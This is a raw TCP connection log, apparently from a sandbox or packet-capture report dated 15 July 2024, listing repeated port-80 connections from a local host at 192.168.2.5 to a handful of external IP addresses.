    Jul 15, 2024 12:50:58.159105062 CEST4971180192.168.2.577.238.224.56
    Jul 15, 2024 12:50:58.163238049 CEST4971180192.168.2.577.238.224.56
    Jul 15, 2024 12:50:58.170074940 CEST804971177.238.224.56192.168.2.5
    Jul 15, 2024 12:50:59.290182114 CEST804971091.142.74.28192.168.2.5
    Jul 15, 2024 12:50:59.290498972 CEST4971080192.168.2.591.142.74.28
    Jul 15, 2024 12:50:59.361953020 CEST4971080192.168.2.591.142.74.28
    Jul 15, 2024 12:50:59.367721081 CEST804971091.142.74.28192.168.2.5
    Jul 15, 2024 12:50:59.377120972 CEST4971280192.168.2.577.238.224.56
    Jul 15, 2024 12:50:59.382931948 CEST804971277.238.224.56192.168.2.5
    Jul 15, 2024 12:50:59.383033991 CEST4971280192.168.2.577.238.224.56
    Jul 15, 2024 12:50:59.386687040 CEST4971280192.168.2.577.238.224.56
    Jul 15, 2024 12:50:59.392844915 CEST804971277.238.224.56192.168.2.5
    Jul 15, 2024 12:50:59.777601957 CEST804971177.238.224.56192.168.2.5
    Jul 15, 2024 12:50:59.777736902 CEST4971180192.168.2.577.238.224.56
    Jul 15, 2024 12:50:59.777833939 CEST4971180192.168.2.577.238.224.56
    Jul 15, 2024 12:50:59.778536081 CEST4971380192.168.2.577.238.229.63
    Jul 15, 2024 12:50:59.783101082 CEST804971177.238.224.56192.168.2.5
    Jul 15, 2024 12:50:59.783796072 CEST804971377.238.229.63192.168.2.5
    Jul 15, 2024 12:50:59.784020901 CEST4971380192.168.2.577.238.229.63
    Jul 15, 2024 12:50:59.785394907 CEST4971380192.168.2.577.238.229.63
    Jul 15, 2024 12:50:59.790553093 CEST804971377.238.229.63192.168.2.5
    Jul 15, 2024 12:51:01.012686968 CEST804971277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:01.012777090 CEST4971280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:01.034713984 CEST4971280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:01.040219069 CEST804971277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:01.071077108 CEST4971480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:01.077691078 CEST804971477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:01.077979088 CEST4971480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:01.167155981 CEST4971480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:01.172665119 CEST804971477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:01.446079016 CEST804971377.238.229.63192.168.2.5
    Jul 15, 2024 12:51:01.446299076 CEST4971380192.168.2.577.238.229.63
    Jul 15, 2024 12:51:01.500559092 CEST4971380192.168.2.577.238.229.63
    Jul 15, 2024 12:51:01.506325960 CEST804971377.238.229.63192.168.2.5
    Jul 15, 2024 12:51:01.676664114 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:01.682145119 CEST804971577.238.250.123192.168.2.5
    Jul 15, 2024 12:51:01.682250977 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:01.896954060 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:01.902786016 CEST804971577.238.250.123192.168.2.5
    Jul 15, 2024 12:51:02.290771008 CEST804971577.238.250.123192.168.2.5
    Jul 15, 2024 12:51:02.413295984 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.429044008 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.435724974 CEST804971577.238.250.123192.168.2.5
    Jul 15, 2024 12:51:02.435807943 CEST4971580192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.718336105 CEST804971477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:02.718583107 CEST4971480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:02.726763010 CEST4971480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:02.732280970 CEST804971477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:02.765053988 CEST4971680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.770865917 CEST804971677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:02.771042109 CEST4971680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.844525099 CEST4971680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:02.850358009 CEST804971677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:03.391365051 CEST804971677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:03.446924925 CEST4971680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:03.452682018 CEST804971677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:03.452914953 CEST4971680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:03.958420992 CEST4971780192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:03.964102983 CEST8049717195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:03.964195013 CEST4971780192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:03.965400934 CEST4971780192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:03.971218109 CEST8049717195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:05.697370052 CEST8049717195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:05.697608948 CEST4971780192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:05.697608948 CEST4971780192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:05.698625088 CEST4971880192.168.2.591.142.74.28
    Jul 15, 2024 12:51:05.705413103 CEST8049717195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:05.705753088 CEST804971891.142.74.28192.168.2.5
    Jul 15, 2024 12:51:05.705951929 CEST4971880192.168.2.591.142.74.28
    Jul 15, 2024 12:51:05.709209919 CEST4971880192.168.2.591.142.74.28
    Jul 15, 2024 12:51:05.714330912 CEST804971891.142.74.28192.168.2.5
    Jul 15, 2024 12:51:07.446747065 CEST804971891.142.74.28192.168.2.5
    Jul 15, 2024 12:51:07.446933985 CEST4971880192.168.2.591.142.74.28
    Jul 15, 2024 12:51:07.447038889 CEST4971880192.168.2.591.142.74.28
    Jul 15, 2024 12:51:07.448067904 CEST4972280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:07.452370882 CEST804971891.142.74.28192.168.2.5
    Jul 15, 2024 12:51:07.453409910 CEST804972277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:07.453488111 CEST4972280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:07.453811884 CEST4972280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:07.459012985 CEST804972277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:09.073873997 CEST804972277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:09.074162960 CEST4972280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:09.074295998 CEST4972280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:09.076690912 CEST4972580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:09.079606056 CEST804972277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:09.082149029 CEST804972577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:09.082387924 CEST4972580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:09.083657026 CEST4972580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:09.089061975 CEST804972577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:10.698513031 CEST804972577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:10.698885918 CEST4972580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:10.698887110 CEST4972580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:10.699791908 CEST4972780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:10.704222918 CEST804972577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:10.705358982 CEST804972777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:10.705442905 CEST4972780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:10.705878973 CEST4972780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:10.711189985 CEST804972777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:11.313143015 CEST804972777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:11.313622952 CEST4972780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:11.319008112 CEST804972777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:11.319082975 CEST4972780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:32.491449118 CEST4972880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:32.497370005 CEST8049728195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:32.497529030 CEST4972880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:32.497910023 CEST4972880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:32.502690077 CEST8049728195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:33.542928934 CEST4972980192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:33.549493074 CEST8049729195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:33.549835920 CEST4972980192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:33.587869883 CEST4972980192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:33.592675924 CEST8049729195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:34.245383978 CEST8049728195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:34.247883081 CEST4972880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:34.247957945 CEST4972880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:34.249589920 CEST4973080192.168.2.591.142.74.28
    Jul 15, 2024 12:51:34.253782034 CEST8049728195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:34.255311012 CEST804973091.142.74.28192.168.2.5
    Jul 15, 2024 12:51:34.255505085 CEST4973080192.168.2.591.142.74.28
    Jul 15, 2024 12:51:34.255948067 CEST4973080192.168.2.591.142.74.28
    Jul 15, 2024 12:51:34.260799885 CEST804973091.142.74.28192.168.2.5
    Jul 15, 2024 12:51:35.286840916 CEST8049729195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:35.286900997 CEST4972980192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:35.287086010 CEST4972980192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:35.287883043 CEST4973180192.168.2.591.142.74.28
    Jul 15, 2024 12:51:35.291786909 CEST8049729195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:35.292722940 CEST804973191.142.74.28192.168.2.5
    Jul 15, 2024 12:51:35.292788982 CEST4973180192.168.2.591.142.74.28
    Jul 15, 2024 12:51:35.293457985 CEST4973180192.168.2.591.142.74.28
    Jul 15, 2024 12:51:35.298229933 CEST804973191.142.74.28192.168.2.5
    Jul 15, 2024 12:51:35.991467953 CEST804973091.142.74.28192.168.2.5
    Jul 15, 2024 12:51:35.991523981 CEST4973080192.168.2.591.142.74.28
    Jul 15, 2024 12:51:35.996669054 CEST4973080192.168.2.591.142.74.28
    Jul 15, 2024 12:51:36.001493931 CEST804973091.142.74.28192.168.2.5
    Jul 15, 2024 12:51:36.007390976 CEST4973280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:36.012617111 CEST804973277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:36.012707949 CEST4973280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:36.043051958 CEST4973280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:36.082089901 CEST804973277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:37.040731907 CEST804973191.142.74.28192.168.2.5
    Jul 15, 2024 12:51:37.040821075 CEST4973180192.168.2.591.142.74.28
    Jul 15, 2024 12:51:37.040901899 CEST4973180192.168.2.591.142.74.28
    Jul 15, 2024 12:51:37.041810036 CEST4973380192.168.2.577.238.224.56
    Jul 15, 2024 12:51:37.046082973 CEST804973191.142.74.28192.168.2.5
    Jul 15, 2024 12:51:37.046962023 CEST804973377.238.224.56192.168.2.5
    Jul 15, 2024 12:51:37.047065973 CEST4973380192.168.2.577.238.224.56
    Jul 15, 2024 12:51:37.048932076 CEST4973380192.168.2.577.238.224.56
    Jul 15, 2024 12:51:37.054929972 CEST804973377.238.224.56192.168.2.5
    Jul 15, 2024 12:51:37.621486902 CEST804973277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:37.621607065 CEST4973280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:37.621701956 CEST4973280192.168.2.577.238.224.56
    Jul 15, 2024 12:51:37.622442007 CEST4973480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:37.626869917 CEST804973277.238.224.56192.168.2.5
    Jul 15, 2024 12:51:37.627628088 CEST804973477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:37.627707958 CEST4973480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:37.628230095 CEST4973480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:37.633517027 CEST804973477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:38.667695999 CEST804973377.238.224.56192.168.2.5
    Jul 15, 2024 12:51:38.667874098 CEST4973380192.168.2.577.238.224.56
    Jul 15, 2024 12:51:38.668042898 CEST4973380192.168.2.577.238.224.56
    Jul 15, 2024 12:51:38.668997049 CEST4973580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:38.672844887 CEST804973377.238.224.56192.168.2.5
    Jul 15, 2024 12:51:38.674015999 CEST804973577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:38.674124956 CEST4973580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:38.674495935 CEST4973580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:38.679431915 CEST804973577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:39.245724916 CEST804973477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:39.245815992 CEST4973480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:39.245945930 CEST4973480192.168.2.577.238.229.63
    Jul 15, 2024 12:51:39.246759892 CEST4973680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:39.253294945 CEST804973477.238.229.63192.168.2.5
    Jul 15, 2024 12:51:39.253305912 CEST804973677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:39.253393888 CEST4973680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:39.253839016 CEST4973680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:39.259346962 CEST804973677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:39.871294022 CEST804973677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:39.871726036 CEST4973680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:39.877615929 CEST804973677.238.250.123192.168.2.5
    Jul 15, 2024 12:51:39.877727985 CEST4973680192.168.2.577.238.250.123
    Jul 15, 2024 12:51:40.321088076 CEST804973577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:40.321221113 CEST4973580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:40.321306944 CEST4973580192.168.2.577.238.229.63
    Jul 15, 2024 12:51:40.322284937 CEST4973780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:40.328098059 CEST804973577.238.229.63192.168.2.5
    Jul 15, 2024 12:51:40.328114033 CEST804973777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:40.328222036 CEST4973780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:40.328762054 CEST4973780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:40.333889008 CEST804973777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:40.939387083 CEST804973777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:40.939639091 CEST4973780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:40.944895029 CEST804973777.238.250.123192.168.2.5
    Jul 15, 2024 12:51:40.944998026 CEST4973780192.168.2.577.238.250.123
    Jul 15, 2024 12:51:41.317159891 CEST4973880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:41.322197914 CEST8049738195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:41.322319984 CEST4973880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:41.322577953 CEST4973880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:41.327430964 CEST8049738195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:43.053283930 CEST8049738195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:43.053411961 CEST4973880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:43.053565025 CEST4973880192.168.2.5195.2.70.38
    Jul 15, 2024 12:51:43.054729939 CEST4973980192.168.2.591.142.74.28
    Jul 15, 2024 12:51:43.058423042 CEST8049738195.2.70.38192.168.2.5
    Jul 15, 2024 12:51:43.059624910 CEST804973991.142.74.28192.168.2.5
    Jul 15, 2024 12:51:43.059832096 CEST4973980192.168.2.591.142.74.28
    Jul 15, 2024 12:51:43.060127974 CEST4973980192.168.2.591.142.74.28
    Jul 15, 2024 12:51:43.064965963 CEST804973991.142.74.28192.168.2.5
    Jul 15, 2024 12:51:44.789011955 CEST804973991.142.74.28192.168.2.5
    Jul 15, 2024 12:51:44.789324999 CEST4973980192.168.2.591.142.74.28
    Jul 15, 2024 12:51:44.789324999 CEST4973980192.168.2.591.142.74.28
    Jul 15, 2024 12:51:44.790029049 CEST4974080192.168.2.577.238.224.56
    Jul 15, 2024 12:51:44.794265985 CEST804973991.142.74.28192.168.2.5
    Jul 15, 2024 12:51:44.795598030 CEST804974077.238.224.56192.168.2.5
    Jul 15, 2024 12:51:44.795686960 CEST4974080192.168.2.577.238.224.56
    Jul 15, 2024 12:51:44.796145916 CEST4974080192.168.2.577.238.224.56
    Jul 15, 2024 12:51:44.801027060 CEST804974077.238.224.56192.168.2.5
    Jul 15, 2024 12:51:46.384376049 CEST804974077.238.224.56192.168.2.5
    Jul 15, 2024 12:51:46.384428024 CEST4974080192.168.2.577.238.224.56
    Jul 15, 2024 12:51:46.384535074 CEST4974080192.168.2.577.238.224.56
    Jul 15, 2024 12:51:46.385272980 CEST4974280192.168.2.577.238.229.63
    Jul 15, 2024 12:51:46.390157938 CEST804974077.238.224.56192.168.2.5
    Jul 15, 2024 12:51:46.390768051 CEST804974277.238.229.63192.168.2.5
    Jul 15, 2024 12:51:46.390841961 CEST4974280192.168.2.577.238.229.63
    Jul 15, 2024 12:51:46.391705036 CEST4974280192.168.2.577.238.229.63
    Jul 15, 2024 12:51:46.397593975 CEST804974277.238.229.63192.168.2.5
    Jul 15, 2024 12:51:47.995811939 CEST804974277.238.229.63192.168.2.5
    Jul 15, 2024 12:51:47.997107983 CEST4974280192.168.2.577.238.229.63
    Jul 15, 2024 12:51:47.997210979 CEST4974280192.168.2.577.238.229.63
    Jul 15, 2024 12:51:47.998259068 CEST4974380192.168.2.577.238.250.123
    Jul 15, 2024 12:51:48.002063990 CEST804974277.238.229.63192.168.2.5
    Jul 15, 2024 12:51:48.003714085 CEST804974377.238.250.123192.168.2.5
    Jul 15, 2024 12:51:48.003906965 CEST4974380192.168.2.577.238.250.123
    Jul 15, 2024 12:51:48.004276037 CEST4974380192.168.2.577.238.250.123
    Jul 15, 2024 12:51:48.009067059 CEST804974377.238.250.123192.168.2.5
    Jul 15, 2024 12:51:48.605667114 CEST804974377.238.250.123192.168.2.5
    Jul 15, 2024 12:51:48.605978966 CEST4974380192.168.2.577.238.250.123
    Jul 15, 2024 12:51:48.620306969 CEST804974377.238.250.123192.168.2.5
    Jul 15, 2024 12:51:48.620431900 CEST4974380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:09.875325918 CEST4974580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:09.880449057 CEST8049745195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:09.880564928 CEST4974580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:09.880846977 CEST4974580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:09.885687113 CEST8049745195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:10.944919109 CEST4974680192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:10.950217962 CEST8049746195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:10.950313091 CEST4974680192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:10.950556993 CEST4974680192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:10.955354929 CEST8049746195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:11.637629986 CEST8049745195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:11.637721062 CEST4974580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:11.637804985 CEST4974580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:11.638883114 CEST4974780192.168.2.591.142.74.28
    Jul 15, 2024 12:52:11.642682076 CEST8049745195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:11.643779039 CEST804974791.142.74.28192.168.2.5
    Jul 15, 2024 12:52:11.643950939 CEST4974780192.168.2.591.142.74.28
    Jul 15, 2024 12:52:11.644249916 CEST4974780192.168.2.591.142.74.28
    Jul 15, 2024 12:52:11.649769068 CEST804974791.142.74.28192.168.2.5
    Jul 15, 2024 12:52:12.679953098 CEST8049746195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:12.680254936 CEST4974680192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:12.680254936 CEST4974680192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:12.680928946 CEST4974880192.168.2.591.142.74.28
    Jul 15, 2024 12:52:12.685534954 CEST8049746195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:12.685899973 CEST804974891.142.74.28192.168.2.5
    Jul 15, 2024 12:52:12.685992956 CEST4974880192.168.2.591.142.74.28
    Jul 15, 2024 12:52:12.686239958 CEST4974880192.168.2.591.142.74.28
    Jul 15, 2024 12:52:12.691092968 CEST804974891.142.74.28192.168.2.5
    Jul 15, 2024 12:52:13.500844002 CEST804974791.142.74.28192.168.2.5
    Jul 15, 2024 12:52:13.500947952 CEST4974780192.168.2.591.142.74.28
    Jul 15, 2024 12:52:13.501029968 CEST4974780192.168.2.591.142.74.28
    Jul 15, 2024 12:52:13.501986980 CEST4974980192.168.2.577.238.224.56
    Jul 15, 2024 12:52:13.505960941 CEST804974791.142.74.28192.168.2.5
    Jul 15, 2024 12:52:13.507004023 CEST804974977.238.224.56192.168.2.5
    Jul 15, 2024 12:52:13.507194042 CEST4974980192.168.2.577.238.224.56
    Jul 15, 2024 12:52:13.507388115 CEST4974980192.168.2.577.238.224.56
    Jul 15, 2024 12:52:13.512545109 CEST804974977.238.224.56192.168.2.5
    Jul 15, 2024 12:52:14.432415009 CEST804974891.142.74.28192.168.2.5
    Jul 15, 2024 12:52:14.432568073 CEST4974880192.168.2.591.142.74.28
    Jul 15, 2024 12:52:14.432657957 CEST4974880192.168.2.591.142.74.28
    Jul 15, 2024 12:52:14.433795929 CEST4975080192.168.2.577.238.224.56
    Jul 15, 2024 12:52:14.438116074 CEST804974891.142.74.28192.168.2.5
    Jul 15, 2024 12:52:14.438749075 CEST804975077.238.224.56192.168.2.5
    Jul 15, 2024 12:52:14.438833952 CEST4975080192.168.2.577.238.224.56
    Jul 15, 2024 12:52:14.439194918 CEST4975080192.168.2.577.238.224.56
    Jul 15, 2024 12:52:14.461783886 CEST804975077.238.224.56192.168.2.5
    Jul 15, 2024 12:52:15.145025015 CEST804974977.238.224.56192.168.2.5
    Jul 15, 2024 12:52:15.145184994 CEST4974980192.168.2.577.238.224.56
    Jul 15, 2024 12:52:15.145428896 CEST4974980192.168.2.577.238.224.56
    Jul 15, 2024 12:52:15.146657944 CEST4975180192.168.2.577.238.229.63
    Jul 15, 2024 12:52:15.150440931 CEST804974977.238.224.56192.168.2.5
    Jul 15, 2024 12:52:15.151894093 CEST804975177.238.229.63192.168.2.5
    Jul 15, 2024 12:52:15.152224064 CEST4975180192.168.2.577.238.229.63
    Jul 15, 2024 12:52:15.152638912 CEST4975180192.168.2.577.238.229.63
    Jul 15, 2024 12:52:15.157828093 CEST804975177.238.229.63192.168.2.5
    Jul 15, 2024 12:52:16.096290112 CEST804975077.238.224.56192.168.2.5
    Jul 15, 2024 12:52:16.096410036 CEST4975080192.168.2.577.238.224.56
    Jul 15, 2024 12:52:16.096508026 CEST4975080192.168.2.577.238.224.56
    Jul 15, 2024 12:52:16.097230911 CEST4975280192.168.2.577.238.229.63
    Jul 15, 2024 12:52:16.101591110 CEST804975077.238.224.56192.168.2.5
    Jul 15, 2024 12:52:16.102391958 CEST804975277.238.229.63192.168.2.5
    Jul 15, 2024 12:52:16.102459908 CEST4975280192.168.2.577.238.229.63
    Jul 15, 2024 12:52:16.102632046 CEST4975280192.168.2.577.238.229.63
    Jul 15, 2024 12:52:16.107490063 CEST804975277.238.229.63192.168.2.5
    Jul 15, 2024 12:52:16.777808905 CEST804975177.238.229.63192.168.2.5
    Jul 15, 2024 12:52:16.777955055 CEST4975180192.168.2.577.238.229.63
    Jul 15, 2024 12:52:16.792634964 CEST4975180192.168.2.577.238.229.63
    Jul 15, 2024 12:52:16.793921947 CEST4975380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:16.797930956 CEST804975177.238.229.63192.168.2.5
    Jul 15, 2024 12:52:16.799072981 CEST804975377.238.250.123192.168.2.5
    Jul 15, 2024 12:52:16.799149990 CEST4975380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:16.807604074 CEST4975380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:16.812613964 CEST804975377.238.250.123192.168.2.5
    Jul 15, 2024 12:52:17.423316956 CEST804975377.238.250.123192.168.2.5
    Jul 15, 2024 12:52:17.423584938 CEST4975380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:17.429104090 CEST804975377.238.250.123192.168.2.5
    Jul 15, 2024 12:52:17.429172993 CEST4975380192.168.2.577.238.250.123
    Jul 15, 2024 12:52:17.734575033 CEST804975277.238.229.63192.168.2.5
    Jul 15, 2024 12:52:17.734702110 CEST4975280192.168.2.577.238.229.63
    Jul 15, 2024 12:52:17.734836102 CEST4975280192.168.2.577.238.229.63
    Jul 15, 2024 12:52:17.735692024 CEST4975480192.168.2.577.238.250.123
    Jul 15, 2024 12:52:17.739675045 CEST804975277.238.229.63192.168.2.5
    Jul 15, 2024 12:52:17.740578890 CEST804975477.238.250.123192.168.2.5
    Jul 15, 2024 12:52:17.740698099 CEST4975480192.168.2.577.238.250.123
    Jul 15, 2024 12:52:17.741628885 CEST4975480192.168.2.577.238.250.123
    Jul 15, 2024 12:52:17.746506929 CEST804975477.238.250.123192.168.2.5
    Jul 15, 2024 12:52:18.350729942 CEST804975477.238.250.123192.168.2.5
    Jul 15, 2024 12:52:18.351016045 CEST4975480192.168.2.577.238.250.123
    Jul 15, 2024 12:52:18.356348991 CEST804975477.238.250.123192.168.2.5
    Jul 15, 2024 12:52:18.356410027 CEST4975480192.168.2.577.238.250.123
    Jul 15, 2024 12:52:18.602849960 CEST4975580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:18.607928991 CEST8049755195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:18.608062029 CEST4975580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:18.608309031 CEST4975580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:18.613147020 CEST8049755195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:20.354840994 CEST8049755195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:20.354923964 CEST4975580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:20.355000019 CEST4975580192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:20.355725050 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:20.359765053 CEST8049755195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:20.360618114 CEST804975691.142.74.28192.168.2.5
    Jul 15, 2024 12:52:20.360696077 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:20.361051083 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:20.365895033 CEST804975691.142.74.28192.168.2.5
    Jul 15, 2024 12:52:22.393913031 CEST804975691.142.74.28192.168.2.5
    Jul 15, 2024 12:52:22.394006014 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:22.394085884 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:22.394701958 CEST804975691.142.74.28192.168.2.5
    Jul 15, 2024 12:52:22.394757986 CEST4975680192.168.2.591.142.74.28
    Jul 15, 2024 12:52:22.394879103 CEST4975780192.168.2.577.238.224.56
    Jul 15, 2024 12:52:22.399049044 CEST804975691.142.74.28192.168.2.5
    Jul 15, 2024 12:52:22.399790049 CEST804975777.238.224.56192.168.2.5
    Jul 15, 2024 12:52:22.399852991 CEST4975780192.168.2.577.238.224.56
    Jul 15, 2024 12:52:22.400051117 CEST4975780192.168.2.577.238.224.56
    Jul 15, 2024 12:52:22.404870987 CEST804975777.238.224.56192.168.2.5
    Jul 15, 2024 12:52:23.996454000 CEST804975777.238.224.56192.168.2.5
    Jul 15, 2024 12:52:23.996532917 CEST4975780192.168.2.577.238.224.56
    Jul 15, 2024 12:52:23.996651888 CEST4975780192.168.2.577.238.224.56
    Jul 15, 2024 12:52:23.997318029 CEST4975880192.168.2.577.238.229.63
    Jul 15, 2024 12:52:24.001578093 CEST804975777.238.224.56192.168.2.5
    Jul 15, 2024 12:52:24.002484083 CEST804975877.238.229.63192.168.2.5
    Jul 15, 2024 12:52:24.002566099 CEST4975880192.168.2.577.238.229.63
    Jul 15, 2024 12:52:24.002881050 CEST4975880192.168.2.577.238.229.63
    Jul 15, 2024 12:52:24.008208036 CEST804975877.238.229.63192.168.2.5
    Jul 15, 2024 12:52:25.643027067 CEST804975877.238.229.63192.168.2.5
    Jul 15, 2024 12:52:25.643177032 CEST4975880192.168.2.577.238.229.63
    Jul 15, 2024 12:52:25.643323898 CEST4975880192.168.2.577.238.229.63
